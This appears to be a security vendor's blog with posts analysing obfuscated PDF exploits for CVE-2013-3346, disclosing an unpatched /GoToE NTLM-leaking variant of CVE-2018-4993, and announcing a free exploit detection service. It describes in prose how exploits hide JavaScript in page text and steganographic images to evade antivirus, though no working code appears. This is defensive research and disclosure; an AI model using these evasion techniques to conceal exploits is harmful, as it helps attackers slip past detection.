Tuesday, January 22, 2019

"steganography" - obfuscating PDF exploits in depth

Shortly after last week's discovery of a PDF exploit which used the method of this.getPageNumWords() & this.getPageNthWord() for obfuscation, we found another, but much more powerful exploit obfuscation technique in PDF exploits. This technique uses a so-called "steganography" method to hide malicious Javascript code in images embedded in PDF files, it is so powerful as it could bypass almost all AV engines.

The sample was detected as "exploit CVE-2013-3346" by our EdgeLogic engine, same as the previous one.

The sample was first submitted to VirusTotal on 2017-10-10, with a filename "oral-b oxyjet spec.pdf".

Only 1 AV engine has detected this exploit last week (however, as of writing, the detection is increased to 5/57).

After opened, the PDF disguised as an IRS document looked normal.

Two layers of obfuscation were used in this sample. The first layer is what we have previously disclosed - the method of "this.getPageNumWords()" and "this.getPageNthWord()". The exploit uses "this.getPageNumWords()" and "this.getPageNthWord()" to read and execute the Javascript hidden as "content". The related code can be found in PDF stream-64.


The second layer is new and it's our focus in this blog. The "Javascript content" is stored in stream-119, let's see what it looks like.

After beautifying the Javascript, it shows as following:

In order to figure out what the Javascript have done, we need to learn these two PDF JS APIs, the this.getIcon() and the util.iconStreamFromIcon() at first. Following is an extract from Adobe's reference.

According to the API references, these two APIs, working together, are to read the stream of an image named as "icon" stored in the PDF file.

By examining the above Javascript code, we figured out that the code’s function is to read and decode the "message" hidden in the icon’s stream. Once it read the "message" successfully , it will execute the "message" as Javascript code, via "eval(msg)".

The icon stream named "icon"  in the object-131 could be saved as a "jpg" file and viewed in image viewer without problem. As shown below:

The malicious data is hidden in the image while the image is still viewable

Nevertheless, there’s no suspicious data can be found inside the icon file, since the malicious code data is heavily obfuscated.

What does the final executed Javascript look like? Here is a piece of the real code, after successful de-obfuscating.

Therefore, we confirmed the exploited vulnerability is CVE-2013-3346.

Furthermore, we deduce that this sample and the previous one were from the same author, for following reasons.
  1. Both of them exploit the same vulnerability (CVE-2013-3346)
  2. The similarity of the Javascript code in these two exploits.
After some googling, we found that the attacker likely copied a project/technique called "steganography.js", which is open sourced here. The project was developed working on browsers. We believe the person behind the PDF samples made their innovation as they successfully leveraged the technique in PDF format.  We could not find any information mentioning such technique in PDF exploits before, so we believe this is the first time that the "steganography" technique is used to hide PDF exploits.

We were impressed by this technique, which is perfect for malicious code obfuscation for PDF exploits. By using this technique, all streams look normal, all images are viewable, everything looks legitimate. This can probably explain why almost all AV engines missed it.

In this blog we researched into the truly advanced "steganography" technique used for obfuscating PDF exploits, which is a demonstration of the power of our EdgeLogic engine as we are able to beat this obfuscation technique, among many others.

Just like the previous one, the "steganography" technique could not only be used to obfuscate this exploit (CVE-2013-3346) but also can be applied to many other PDF exploits including zero-days. We ask security defenders to pay close attention to it.

Follow us @EdgeSpot_io.

Monday, January 14, 2019

An interesting obfuscation method for PDF exploits (this.getPageNumWords() & this.getPageNthWord())

Recently, our EdgeLogic engine detected a malicious PDF sample, reported as "exploit CVE-2013-3346".

The sample first appeared on VirusTotal on 2017-10-06.

Although this sample is on VT for more than 1 year, most Av engines are unable to detect it.

Therefore it was brought to our attention when it was successfully detected by our engine. We analysed the sample manually. The stream of object-1 contains interesting JavaScript.

It uses PDF JS API this.getPageNumWords() and this.getPageNthWord() to "read" the Javascript contents on the PDF pages, then, it execute the Javascripts via eval(box).

We can see the object-6, object-8, and object-10 contains Javascript - but they are in "content" - used for object-1.

content of object-6

content of object-8

content of object-10

After some googling, we believe this is an exploit for PDF vulnerability CVE-2013-3346 for which FireEye had a blog in December 2013, and the exploit was not obfuscated at that time. Because of the obfuscation method, it remains largely undetected by AV engines.

The obfuscation method seems not new also, it was mentioned in a 2010 blog from F-Secure. However, as we have seen, the method is still quite effective.

When displayed on a non-vulnerable PDF reader, the PDF displays like this.

The above is for the 1st page. The PDF contains total 4 pages, the rest three pages are for the object-6, object-8, object-10, respectively. The exploit maker made the words on these three pages with very small size, but after zooming to 500% we could confirm that these are JS strings we found in object-6, object-8, and object-10.

Conclusion The obfuscation method described in this blog may not be new, but it is very effective to bypass many detection engines. More importantly, we should realize that such obfuscation method could be used to obfuscate not only this (CVE-2013-3346) exploit but many other PDF exploits including zero-days. This is another good example demonstrating the power of our EdgeLogic engine - we were able to beat the obfuscation method used in this PDF exploit. So, when you encounter some suspicious samples, no matter it is an email format (eml, msg), Office files (doc, xls, ppt), pdf, or even .zip, try edgespot.io and see what it detects!
Follow us @EdgeSpot_io.

Tuesday, November 13, 2018

The case of the unpatched variant of the PDF NTLM leaking vulnerability CVE-2018-4993

In April or May 2018, Check Point released a blog post detailing a NTLM leaking vulnerability on Adobe Reader & Foxit Reader. Later, Adobe released a security advisory claiming the vulnerability was fixed since Acrobat Reader DC 2018.011.20040. However, we found that only one variant of this vulnerability were successfully patched by Adobe, and the other variant was not actually addressed.

The story
Recently, during a testing for our EdgeLogic engine (the backend engine of our free exploit detection service edgespot.io), we found at least two samples producing interesting detection results.

When we put these two samples into our engine, they were detected as "MALICIOUS - POTENTIAL ZERO-DAY ATTACK (NTLM leaking)". They looks like the following:

[Update on Nov. 14]
Users of edgespot.io will find the Detection Details of this particular threat have been changed to "exploit CVE-2018-15979 (NTLM leaking), previously zero-day (modified on 20181114)", starting today. This is because today we modified the description of the threat, to reflect that the patch is available and a CVE ID is assigned to this threat.

Could it be a false detection? Of course it could be. Given that the techniques of attacking are always evolving, exploit detection is not an easy task.

In order to confirm this test result, we fired up our VM, updated it to the latest Adobe Reader version, and tested those two samples manually. We observed that those two samples still making the NTLM traffic going out.

After further research, we confirmed that those two samples are actually exploiting the same or similar vulnerability CVE-2018-4993, which was discussed by the Check Point blog post we mentioned earlier. As in the Check Point blog, it stated:
/S entry: Describes the type of action to be performed. The GoTo action changes the view to a specified destination within the document. The action types GoToR, (Go To Remote) and GoToE (Go To Embedded), both vulnerable, jump to destinations in another PDF file.
When we examined the content of the two samples, we found the key parts of the two pdfs are:

They both use the “/GotoE” keyword to trigger the NTLM leaking. We later confirmed that while the method of "/GotoR" was patched by Adobe, the method of "/GotoE" was not.

We conclude this is a failure patching of the CVE-2018-4993 rather than a new vulnerability because the Check Point blog mentioned this variant when disclosing the CVE-2018-4993. Please note we do not know if both variants (“/GoToR” and “/GoToE”) were reported to Adobe by Check Point, but clearly, one variant was not fixed.

Nevertheless, from the view of protecting users, it is a big deal for following reasons:
  1. This is about a zero-day (no patch) exploit.
  2. The detail of the zero-day exploit has been in the public for more than 5 months.
  3. Regarding the two samples on VT (it's likely there's more, although we found these two samples by chance), we do not know why they were submitted to VT and who did it, there is possibility that bad guys realized this variant was not patched so trying to test their zero-day exploits.
We realized this is an important finding, therefore, we reported to Adobe as fast as we can regardless of our busy agenda of developing the system & website for edgespot.io. We are happy that they took this issue quickly and patched it fast, here is the disclosure timeline:

2018.11.04 finding reported to Adobe
2018.11.05 Adobe confirmed the finding & notified us they plan to release a patch on Nov. 13
2018.11.13 patch released & blog post released

We ask users to patch their Adobe Reader as soon as possible, please follow Adobe's security advisory released today.

This finding proves the power of our EdgeLogic engine that behinds the https://edgespot.io - it has outstanding capability of identifying unknown & zero-day exploits! By offering it as a free service to everyone, we hope to make the internet a safer place. So, when you encounter some suspicious samples, no matter it is an email format (eml, msg), Office files (doc, xls, ppt), pdf, or even .zip, try edgespot.io and see what it detects!

[Update on Nov. 14]
We have detected yet another sample exploiting this zero-day.

Unlike the previous two that used internal IP addresses, this one used an external IP address, which looks more likely a real in-the-wild attack.We're sharing this info to help the security community on threat intelligence.

Sunday, November 4, 2018

Announcing edgespot.io - a free exploit detection service with cutting-edge techniques!

Today, we're excited to announce the general availability (BETA) of edgespot.io - a free exploit detection service with cutting-edge techniques!

Today's cyber attacks especially those advanced ones, usually start with an exploit. For instance, the "embedded" malware may run as soon as the user opens an email with an attachment. They may exploit patched vulnerabilities since the fact is that not all users patch their various software in time. Furthermore, they may exploit zero-day vulnerabilities, leaving the victim a "nowhere to go" position.

Edgespot.io is specifically built for fighting against those advanced threats. It works like the way of the famous virustotal.com - you upload a file and it tells whether the file is malicious. However, they have huge differences.
  1. edgespot.io does NOT rely on or use any other malware or exploit detection engine, it is powered by our own (independent) EdgeLogic exploit analysis engine.
  2. edgespot.io does NOT accept "executable" samples (e.g. .exe/.dll), instead, it's developed for detecting client-side exploit samples (for now). The most popular sample types we're currently dealing with are Microsoft Office files (Word, Excel, PowerPoint), PDFs, emails, etc.
After a file is submitted on edgespot.io, it will be analyzed by our EdgeLogic system, which is an innovative exploit analysis system invented and built by us. The system is powered by various cutting-edge technologies such as machine learning, dynamic and static sample analysis, etc., but most importantly, it's built from a sense of exploit research.

Following is a screenshot showing a sample was detected as a CVE-2017-11882 exploit.

Please note that comparing to other malware detection service/product, the advantage of edgespot.io is its outstanding capability of detecting unknown or even zero-day exploits! Based on our in-labs tests, the result is very promising.

We hope you love the service, more details please read our About page here. You may have a try right now.:)

Please do not hesitate to reach us whether via email (contact@edgespot.io) or our contact page or twitter, you're always welcome. Let's work together and make the internet a safer place.

The EdgeSpot team